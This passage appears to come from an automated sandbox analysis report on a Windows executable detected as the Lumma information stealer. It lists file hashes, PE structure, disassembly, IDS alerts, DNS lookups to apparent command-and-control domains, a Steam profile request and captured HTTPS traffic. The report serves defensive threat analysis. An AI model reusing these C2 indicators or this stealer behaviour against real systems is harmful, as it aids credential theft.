                                                    • 172.65.190.172
                                                    AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3
                                                    file.exeGet hashmaliciousLummaCBrowse
                                                    • 104.102.49.254
                                                    • 188.114.96.3

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.948035120414487
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:file.exe
                                                    File size:1'823'232 bytes
                                                    MD5:ac789b4838922466f1437f6e440dc4a3
                                                    SHA1:97fc5c2cdbe860263e156b840ace62149fca84d8
                                                    SHA256:074ee51d9bc6abc3f6c43925201998cdcb801413fc80cde720e493a0dc0e6dd5
                                                    SHA512:21b4a75bc0e999d8108d0ff188dacdec3e072b6061e59d42db62b7b6093c81b26cab87741becdad7522fd1c476124c5e3fdba1ed63066f5441439f8f4e9542d7
                                                    SSDEEP:24576:nIAPkmmaMxV58Kv89io+8pPxgdjLpHnox/ZlNIFp8eljRfWWh9kEPw6ei3vZ:IAc1a+8Kv8z+JZHnqZwp8So0O6p
                                                    TLSH:CD8533B94C7662A1D29FD67082FF6A04B719DB364B727A645E503F2F9037B30235C889
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................H...........@...........................I...........@.................................W...k..

                                                    File Icon

                                                    Icon Hash:90cececece8e8eb0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x88d000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F2FF4B4861Ah
                                                    cmpxchg byte ptr [ebx], bl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add cl, ch
                                                    add byte ptr [eax], ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [esi], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [ecx], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], cl
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    push es
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [esi], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax*4], cl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    push es
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    and al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add dword ptr [eax+00000000h], eax
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+0Ah], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    or byte ptr [eax+00000000h], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x5d0000x25e0052cbaf997135f092d0d18b534289e193False0.9994907693894389data7.978710446995474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x600000x2980000x2008e777be1ac9c5328d9be7903fbb765d9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    ezfjqhpg0x2f80000x1940000x193800f9cb64eca29081bfe3fbdad7421ec581False0.9938586682930607data7.953552456980984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    piwvgdex0x48c0000x10000x600f570eede1e7c5fafc6cfcb73f2684cc6False0.564453125data4.943781154703711IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0x48d0000x30000x220051f746c2ebc065fb5863748c3a96431eFalse0.05434283088235294DOS executable (COM)0.6557087714052959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-06T11:35:07.058401+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4651851.1.1.153UDP
                                                    2024-10-06T11:35:08.060298+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4651851.1.1.153UDP
                                                    2024-10-06T11:35:08.740534+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4600521.1.1.153UDP
                                                    2024-10-06T11:35:08.754490+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4569211.1.1.153UDP
                                                    2024-10-06T11:35:08.767142+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4585551.1.1.153UDP
                                                    2024-10-06T11:35:08.793486+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4629831.1.1.153UDP
                                                    2024-10-06T11:35:08.803774+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4631071.1.1.153UDP
                                                    2024-10-06T11:35:08.813764+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4568761.1.1.153UDP
                                                    2024-10-06T11:35:08.822303+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4584231.1.1.153UDP
                                                    2024-10-06T11:35:12.775553+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731188.114.96.3443TCP
                                                    2024-10-06T11:35:12.775553+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731188.114.96.3443TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 6, 2024 11:35:08.853049994 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:08.853156090 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:08.853245020 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:08.859011889 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:08.859049082 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:09.515893936 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:09.515985012 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:09.519084930 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:09.519118071 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:09.519668102 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:09.559983015 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:09.561976910 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:09.607434988 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049321890 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049371004 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049421072 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.049489021 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049520016 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049550056 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.049551010 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.049576044 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.049607992 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.049627066 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.149796963 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.149853945 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.150003910 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.150063038 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.150125980 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.155133009 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.155209064 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.155229092 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.155277014 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.155289888 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.155411959 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.155462980 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.156939983 CEST49730443192.168.2.4104.102.49.254
                                                    Oct 6, 2024 11:35:10.156971931 CEST44349730104.102.49.254192.168.2.4
                                                    Oct 6, 2024 11:35:10.203038931 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:10.203126907 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:10.203216076 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:10.203739882 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:10.203779936 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:11.343913078 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:11.344331026 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:11.346519947 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:11.346575022 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:11.347083092 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:11.348447084 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:11.348447084 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:11.348584890 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:12.775583029 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:12.775825024 CEST44349731188.114.96.3192.168.2.4
                                                    Oct 6, 2024 11:35:12.776030064 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:12.776031017 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:12.776113987 CEST49731443192.168.2.4188.114.96.3
                                                    Oct 6, 2024 11:35:12.776151896 CEST44349731188.114.96.3192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 6, 2024 11:35:07.058401108 CEST6518553192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.060297966 CEST6518553192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.737099886 CEST53651851.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.737154961 CEST53651851.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.740534067 CEST6005253192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.751765013 CEST53600521.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.754489899 CEST5692153192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.764913082 CEST53569211.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.767142057 CEST5855553192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.791311979 CEST53585551.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.793486118 CEST6298353192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.802722931 CEST53629831.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.803774118 CEST6310753192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.812588930 CEST53631071.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.813764095 CEST5687653192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.821404934 CEST53568761.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.822303057 CEST5842353192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.831715107 CEST53584231.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:08.841116905 CEST6290953192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:08.848843098 CEST53629091.1.1.1192.168.2.4
                                                    Oct 6, 2024 11:35:10.159137964 CEST5315853192.168.2.41.1.1.1
                                                    Oct 6, 2024 11:35:10.173011065 CEST53531581.1.1.1192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 6, 2024 11:35:07.058401108 CEST192.168.2.41.1.1.10xae8Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.060297966 CEST192.168.2.41.1.1.10xae8Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.740534067 CEST192.168.2.41.1.1.10xe2ccStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.754489899 CEST192.168.2.41.1.1.10xf052Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.767142057 CEST192.168.2.41.1.1.10x29f6Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.793486118 CEST192.168.2.41.1.1.10xab93Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.803774118 CEST192.168.2.41.1.1.10x49beStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.813764095 CEST192.168.2.41.1.1.10xb953Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.822303057 CEST192.168.2.41.1.1.10x591aStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.841116905 CEST192.168.2.41.1.1.10x758Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:10.159137964 CEST192.168.2.41.1.1.10x11d5Standard query (0)sensatinwu.buzzA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 6, 2024 11:35:08.737099886 CEST1.1.1.1192.168.2.40xae8Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.737154961 CEST1.1.1.1192.168.2.40xae8Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.751765013 CEST1.1.1.1192.168.2.40xe2ccName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.764913082 CEST1.1.1.1192.168.2.40xf052Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.791311979 CEST1.1.1.1192.168.2.40x29f6Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.802722931 CEST1.1.1.1192.168.2.40xab93Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.812588930 CEST1.1.1.1192.168.2.40x49beName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.821404934 CEST1.1.1.1192.168.2.40xb953Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.831715107 CEST1.1.1.1192.168.2.40x591aName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:08.848843098 CEST1.1.1.1192.168.2.40x758No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:10.173011065 CEST1.1.1.1192.168.2.40x11d5No error (0)sensatinwu.buzz188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 6, 2024 11:35:10.173011065 CEST1.1.1.1192.168.2.40x11d5No error (0)sensatinwu.buzz188.114.97.3A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • steamcommunity.com
                                                    • sensatinwu.buzz

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449730104.102.49.2544431352C:\Users\user\Desktop\file.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-06 09:35:09 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                    Connection: Keep-Alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Host: steamcommunity.com
                                                    2024-10-06 09:35:10 UTC1870INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                    Cache-Control: no-cache
                                                    Date: Sun, 06 Oct 2024 09:35:09 GMT
                                                    Content-Length: 34827
                                                    Connection: close
                                                    Set-Cookie: sessionid=0df5b45d1962e0ad9b71c86e; Path=/; Secure; SameSite=None
                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                    2024-10-06 09:35:10 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                    2024-10-06 09:35:10 UTC16384INData Raw: 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65
                                                    Data Ascii: t type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_he
